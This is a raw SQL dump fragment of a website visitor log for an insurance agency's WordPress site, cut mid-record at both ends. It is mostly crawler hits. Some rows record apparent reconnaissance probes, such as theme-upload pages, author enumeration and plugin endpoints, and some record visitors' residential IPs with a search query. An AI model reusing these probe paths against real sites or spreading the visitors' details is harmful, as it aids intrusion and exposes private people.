+http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8796,'0b_d39e7c7bb5296815c3fc355b3979f6be','1458881372','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8798,'0b_625269bd7e01090a43d74060c248a39d','1458881379','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8801,'0b_625269bd7e01090a43d74060c248a39d','1458881379','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8802,'0b_625269bd7e01090a43d74060c248a39d','1458881380','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8804,'0b_625269bd7e01090a43d74060c248a39d','1458881381','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8805,'0b_625269bd7e01090a43d74060c248a39d','1458881382','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8808,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881384','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8811,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881384','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8814,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881385','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8817,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881386','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8820,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881386','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8823,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881387','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8826,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881388','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8829,'0b_ef5caf2bc5bc1fbea7153c18a83c1856','1458882363','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/SSO/235_29.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8831,'0b_80a4c097bcc7aaf090ad50408e612e2c','1458883629','180.76.15.16','baiduspider-180-76-15-16.crawl.baidu.com','/register/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(8832,'0b_1798012baebec0b1f9150a2ec43b7cc8','1458894897','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8834,'0b_da445a612a44a192ee78e1bd855478bb','1458896053','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8835,'0b_da445a612a44a192ee78e1bd855478bb','1458896055','68.180.230.123','b115363.yse.yahoo.net','/term-quotes/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8838,'0b_da445a612a44a192ee78e1bd855478bb','1458896185','68.180.230.123','b115363.yse.yahoo.net','/term-quotes/feed/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8840,'0b_bd9f77f9859d478a8d9263009730b23e','1458897070','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8843,'0b_d38c7dca928d482a54dd55fa4c2caf1c','1458898838','178.32.127.112','WIN-96VQ81BM844','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(8844,'0b_d38c7dca928d482a54dd55fa4c2caf1c','1458898844','178.32.127.112','WIN-96VQ81BM844','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(8847,'0b_01336bf4c67e54751532e81d801beb36','1458902420','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8849,'0b_b92a07492957f04e3274bd51985b1efe','1458902473','204.79.180.149','204.79.180.149','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)','','',0,'WinVista','IE 9','us','','','','','','','0','0',0),(8852,'0b_e901f951d2441344d75e6f28fb412e02','1458904735','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(8855,'0b_ce8f65591a2b043d6dfa48392689c6d0','1458907299','204.79.180.47','204.79.180.47','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(8856,'0b_815d5da72c2e7cd858199c087d0327f2','1458907426','66.249.75.89','crawl-66-249-75-89.googlebot.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8859,'0b_c794f82edc96e4cd4dcee18ec193e82e','1458908939','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8861,'0b_acf958e94c72f26be695360957f2fb6e','1458909446','66.249.75.89','crawl-66-249-75-89.googlebot.com','/resources.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8864,'0b_fc20a451b4b266756719058dd741f94e','1458909939','5.149.254.109','5.149.254.109','/wordpress/','Mozilla/5.0 (Macintosh U Intel Mac OS X 10_5_6 ru-ru) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1','','',0,'MacOSX','Version 3','','','','','','','','0','0',0),(8867,'0b_6e08b5ef5956ef3eef5e42c159991679','1458910275','144.76.30.236','thoreau.tk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','0','0',0),(8868,'0b_6e08b5ef5956ef3eef5e42c159991679','1458910278','144.76.30.236','thoreau.tk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','0','0',0),(8870,'0b_56436ece4a28aea2320541f997c2c026','1458912218','69.115.129.0','ool-45738100.dyn.optonline.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=campanion+life+chronic+illness+ider&form=PRUSEN&pc=EUPP_UE01&mkt=en-us&refig=893cf7bb7a4840ab878c11ebd1a9acc6&pq=campanion+life+chronic+illness+ider&sc=0-20&sp=-1&qs=n&sk=&cvid=893cf7bb7a4840ab878c11ebd1a9acc6','campanion life chronic illness ider',1,'Win10','','us','','Bing','','','','','0','0',0),(8871,'0b_56436ece4a28aea2320541f997c2c026','1458912218','69.115.129.0','ool-45738100.dyn.optonline.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=campanion+life+chronic+illness+ider&form=PRUSEN&pc=EUPP_UE01&mkt=en-us&refig=893cf7bb7a4840ab878c11ebd1a9acc6&pq=campanion+life+chronic+illness+ider&sc=0-20&sp=-1&qs=n&sk=&cvid=893cf7bb7a4840ab878c11ebd1a9acc6','campanion life chronic illness ider',1,'Win10','','us','','Bing','','','','','0','0',0),(8873,'0b_df45634d2f273b0226151f170e1c3b09','1458913521','66.249.75.96','crawl-66-249-75-96.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8874,'0b_2759b9fb43868df566798874b56bee55','1458917333','157.55.39.133','msnbot-157-55-39-133.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8877,'0b_2759b9fb43868df566798874b56bee55','1458917381','157.55.39.133','msnbot-157-55-39-133.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8879,'0b_086e3514e6bd2da57af5999d236210c5','1458918350','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8880,'0b_086e3514e6bd2da57af5999d236210c5','1458918354','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8882,'0b_086e3514e6bd2da57af5999d236210c5','1458918356','184.154.36.163','scan21.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8883,'0b_086e3514e6bd2da57af5999d236210c5','1458918358','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8885,'0b_086e3514e6bd2da57af5999d236210c5','1458918361','184.154.36.163','scan21.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8886,'0b_086e3514e6bd2da57af5999d236210c5','1458918363','184.154.36.163','scan21.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8888,'0b_49c62ba8eea663bae08e02ae0ca07106','1458919311','23.80.155.204','23.80.155.204.rdns.as15003.net','/wp-admin/admin-ajax.php?action=tribe_list&tribe_paged=1&tribe_event_display=list','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','','',0,'Win10','Chrome 40','','','','','','','','3','0',0),(8891,'0b_49c62ba8eea663bae08e02ae0ca07106','1458919312','23.80.155.204','23.80.155.204.rdns.as15003.net','/?plugin=all-in-one-event-calendar&controller=ai1ec_exporter_controller&action=export_events&no_html=true','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','','',0,'Win10','Chrome 40','','','','','','','','3','0',0),(8892,'0b_aebd56397ff1f3e3d06b3a7709e3f995','1458920990','108.61.61.227','108.61.61.227.choopa.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(8895,'0b_154539e4aa07688cb424456b639d041e','1458921430','100.43.91.1','spider-100-43-91-1.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(8898,'0b_a083e5a091d04bb658dc30a15a6e97cc','1458924416','208.184.112.74','208.184.112.74.available','/','Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.bing.com','',0,'Win7','IE 8','','','','','','','','0','0',0),(8900,'0b_5aff13639f6e5e6bdcba0bcc878ea804','1458924439','193.111.136.162','3.tor.exit.babylon.network','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)','http://www.empireins.com/','',0,'Win7','IE 10','us','','','','','','','0','0',0),(8901,'0b_bba1baa91d77d53ae0c6bba4de9d6a42','1458925116','150.70.173.50','150-70-173-50.trendmicro.com','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)','','',0,'WinXP','IE 8','','','','','','','','0','0',0),(8903,'0b_a2578dd9ee6a7dc82f76ce156f91f2e5','1458925923','162.247.72.201','kunstler.tor-exit.calyxinstitute.org','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(8904,'0b_b23177f2b6f6c938c6f2e1d6b27f3fb8','1458926712','141.8.143.235','spider-141-8-143-235.yandex.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8907,'0b_24db0bf331d73945a6217b9aeedb63bb','1458929658','65.19.167.131','65.19.167.131','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(8909,'0b_85141fb1fb90517c5b289d55fccdde6f','1458934871','141.8.143.242','spider-141-8-143-242.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8912,'0b_11fcf0f5b3c050164946abf44f096207','1458935634','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8915,'0b_e3a429a98ca74bbd596af55c6d8f35a6','1458938208','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(8918,'0b_48cb4819f548d04037d3ab1b257b2440','1458941086','103.31.200.97','103.31.200.97','/robots.txt','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/robots.txt','',0,'WinXP','IE 8','','','','Unknown Spider','','','','0','0',0),(8921,'0b_48cb4819f548d04037d3ab1b257b2440','1458941097','103.31.200.97','103.31.200.97','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(8924,'0b_8cd2187206864c5fc5f2dbdbcff5637c','1458942546','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8925,'0b_8cd2187206864c5fc5f2dbdbcff5637c','1458942568','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8928,'0b_4d8cddb67ea72be17c3fa7fd9da1a5ff','1458944120','141.8.143.235','spider-141-8-143-235.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(8930,'0b_d244e62daac7593521f0102781dac551','1458944558','103.31.200.249','103.31.200.249','/robots.txt','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://empireins.com/robots.txt','',0,'WinXP','IE 8','','','','Unknown Spider','','','','0','0',0),(8931,'0b_d244e62daac7593521f0102781dac551','1458944572','103.31.200.249','103.31.200.249','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://empireins.com/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(8933,'0b_d244e62daac7593521f0102781dac551','1458944583','103.31.200.249','103.31.200.249','/robots.txt','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/robots.txt','',0,'WinXP','IE 8','','','','','','','','0','0',0),(8936,'0b_d244e62daac7593521f0102781dac551','1458944597','103.31.200.249','103.31.200.249','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(8939,'0b_f397da9a33f753b9c0ac8a093d58a740','1458945164','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8940,'0b_b143932b7389f1ed3e2c8c70939d95a9','1458946112','100.43.81.146','spider-100-43-81-146.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(8943,'0b_f397da9a33f753b9c0ac8a093d58a740','1458946667','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8946,'0b_0a97a8fbff6f510a1c12d0e506e22f7b','1458949053','91.121.83.118','ns352473.ovh.net','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','','',0,'Win8','Google Chrome','','','','','','','','0','0',0),(8948,'0b_102998d28a47b9ac15507b4128b64388','1458949190','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8949,'0b_102998d28a47b9ac15507b4128b64388','1458949190','68.180.230.123','b115363.yse.yahoo.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8952,'0b_4fdf6d504d2e0cf6d85df34ee85758e6','1458949278','100.43.91.15','spider-100-43-91-15.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8955,'0b_26242fad0c985b508f08f85c835e5af9','1458950290','66.249.75.109','crawl-66-249-75-109.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8958,'0b_4a63082070f344e328d49cb22ad1b94a','1458950293','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8961,'0b_26242fad0c985b508f08f85c835e5af9','1458950299','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8964,'0b_9ff2a7178e9f1da153beaa47e6011773','1458952049','162.243.5.155','162.243.5.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0','','',0,'Win7 x64','Firefox 33','','','','','','','','0','0',0),(8966,'0b_0e28ef45afd91aa4e0c4678d86b3d36a','1458952049','87.201.247.162','87.201.247.162','/?author=1','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Win8 x64','Firefox 28','us','','','','','','','0','0',0),(8969,'0b_fec89fd5c849d8aa887fd8f888ce6c28','1458952360','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8970,'0b_a6b256135fbbf4ce6e21ae7efadfc7de','1458955882','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8972,'0b_3d56cf7717e14ecdba5cba2f627fe8a4','1458956500','66.249.75.96','crawl-66-249-75-96.googlebot.com','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8975,'0b_3df1e2bab4719411637413de83d0b698','1458957309','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8976,'0b_401be785791f23813f65cbef7f0cab57','1458957805','100.43.85.28','spider-100-43-85-28.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8979,'0b_e523b701c41b08ff61692cf07dbc4968','1458958232','141.8.143.214','spider-141-8-143-214.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(8982,'0b_56f7e614561e22413394b675c54c5852','1458958289','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8984,'0b_97a152ceb3b4f0ef88398d6f9f940d23','1458960273','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8985,'0b_d8d3958cb88af79f3dab77694b77d75e','1458960790','68.180.230.123','b115363.yse.yahoo.net','/forms/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8987,'0b_061dfa1fd7310a19e51fcae3b1e879c1','1458965281','46.4.123.172','static.172.123.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8990,'0b_061dfa1fd7310a19e51fcae3b1e879c1','1458965284','46.4.123.172','static.172.123.4.46.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8991,'0b_061dfa1fd7310a19e51fcae3b1e879c1','1458965285','46.4.123.172','static.172.123.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8994,'0b_061dfa1fd7310a19e51fcae3b1e879c1','1458965288','46.4.123.172','static.172.123.4.46.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8996,'0b_061dfa1fd7310a19e51fcae3b1e879c1','1458965291','46.4.123.172','static.172.123.4.46.clients.your-server.de','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8997,'0b_061dfa1fd7310a19e51fcae3b1e879c1','1458965296','46.4.123.172','static.172.123.4.46.clients.your-server.de','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(8999,'0b_780abec9e15a82270371857f810d38d0','1458966769','91.20.18.99','p5b141263.dip0.t-ipconnect.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(9000,'0b_780abec9e15a82270371857f810d38d0','1458966773','91.20.18.99','p5b141263.dip0.t-ipconnect.de','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(9003,'0b_780abec9e15a82270371857f810d38d0','1458966779','91.20.18.99','p5b141263.dip0.t-ipconnect.de','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(9005,'0b_6217479f19e110af24373d9d135d6d4f','1458967828','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/SSO/235_18.html','Mozilla/5.0 